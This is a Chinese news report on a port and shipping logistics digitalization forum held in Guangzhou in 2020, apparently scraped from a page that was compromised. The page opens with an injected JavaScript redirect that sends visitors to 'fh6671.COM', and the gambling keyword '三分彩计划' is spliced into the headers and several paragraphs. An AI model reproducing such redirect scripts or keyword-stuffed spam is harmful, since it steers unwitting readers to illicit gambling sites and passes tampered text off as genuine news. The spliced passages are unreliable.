function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 要闻

数字化时代港航物流发展论坛在广州举办

2020-11-17 16:14:24 来源:中国交通新闻网 作者:记者 王肖丰 通讯员 郭跃

11月17日,由中国航海学会主办、招商局集团承办的数字化时代港航物流发展论坛在广州举办。来自港航物流企业、航运研究机构、航海院校,中国航海学会理事、监事、分支机构和各地方航海学会代表及航海科技奖获奖者等100多位嘉宾出齐聚一堂,围绕数字化时代港航物流发展深入交流。中国航海学会理事长何建中、交通运输部原副部长徐祖远出席论坛。

数字化时代的港航物流发展,指的是港航物流利用信息、网络、通信和人工智能等现代高新技术对传统航运数据进行展现、整合、挖掘、处理,实现港航物流生产、服务、运营、监管的信息化、数字化和智能化技术处理,实现提质、降本、增效。

本次论坛聚焦港航物流数字化发展,彰显了科技创新、数字创新引领水运业转型升级的时代特色。交通运输部水运局副局长易继勇在致辞中表示,港航物流业要应用新一代信息技术,培育航运发展新模式、新业态,形成发展新动能,加强建设水运领域新型基础设施、推进智能船舶技术应用、培育航运服务新业态新模式,加快推进水运业高质量发展,为全面开启“十四五”交通强国新征程贡献智慧和力量。

三分彩计划智能航运是现代信息、通信、感知、大数据和人工智能等高新技术与传统航运要素深度融合而形成的航运新系统和新业态,是航运业未来发展的必然趋势。中国航海学会常务副理事长张宝晨在致辞中表示,智能航运不仅会把我们带入船舶货运无人化时代, 还将导致传统航运业与船舶制造业的深刻革命,会为我国从航运大国走向航运强国提供重大机遇。

招商局集团副总经理王宏在致辞中表示,随着数字化时代进程的加速,带来的不仅仅是效率的提升,而是从战略到架构、从管理到运营、从技术到组织进行全方位、深层次的自我颠覆和重构。数字化时代有四个明显特征,一是万物互联、二是客户需求多元化和个性化、三是技术的快速迭代和颠覆、四是产品和服务模式发生根本变化。招商局集团在智慧船舶方面、智慧港口方面和智慧信息平台方面进行了很多的尝试和努力。

在新的全球经济格局下,数据成为重要的战略性资源和关键性生产要素,数据驱动的高效物流扮演着至关重要的角色。宋德星认为,数字供应链已成为全球竞争的战略制高点,大数据成为行业高质量发展的新动能,打造覆盖行业的大数据平台迫在眉睫。大数据平台将围绕供应链全程物流业务,由政府支持推进、国资控股并吸纳社会及民营优势资本共建,为全社会物流业供需各方提供广泛的数据连接、数据服务和物流交易服务。

智能航运联结港、船、岸,既是信息基础设施、又是融合基础设施,还是创新基础设施。交通运输部水运科学研究院智能航运研究中心(法律研究中心)主任耿雄飞认为,通过新型感知基础设施、新型网络基础设施、新型数据基础设施和新型安全基础设施,将有助于实现新基建背景下的“智能航运”。招商轮船首席数字官丁军表示,数据规模的指数级增加和分析算法的智能化发展,为数字化、智能化时代奠定了技术基础,新兴数字技术与航运业的融合嫁接与应用深化,加快了航运数字生态的形成。

三分彩计划招商港口首席数字官李玉彬提出,港口“新基建”的本质是智慧港口,实现港口资源、技术、服务和管理深度融合,实现开放共享、系统高效、绿色环保、可持续发展的新型港口形态。李玉彬以深圳妈湾港为例,分享了招商智慧港口解决方案与实践,并希望携手各方,助推港口行业转型升级,共同打造中国智汇。

供应链整合及数字化是未来港口及航运发展的核心趋势。德勤管理咨询交通与物流行业合伙人冯莉提出,航运行业数字化包括数字化运营、数字化客户体验、数字化业务模式三个方面。行业领先企业已开始在数字化转型领域进行持续投入,并已开始持续收获回报,数字化为企业带来的是新的商业模式,带来难以量化的价值。

三分彩计划上海国际航运研究中心秘书长助理、航运物流大数据实验室主任徐凯介绍了上海国际航运研究中心已持续8年探索基于大数据的海运决策支持研究,从干散货船运价走势预测和集装箱班轮运输方案分别举例,展示研究成果。在会上发布了《全球港航信息化发展报告》,介绍了全球港行信息化市场规模和港航业信息科技成熟度曲线等。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

三分彩计划围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。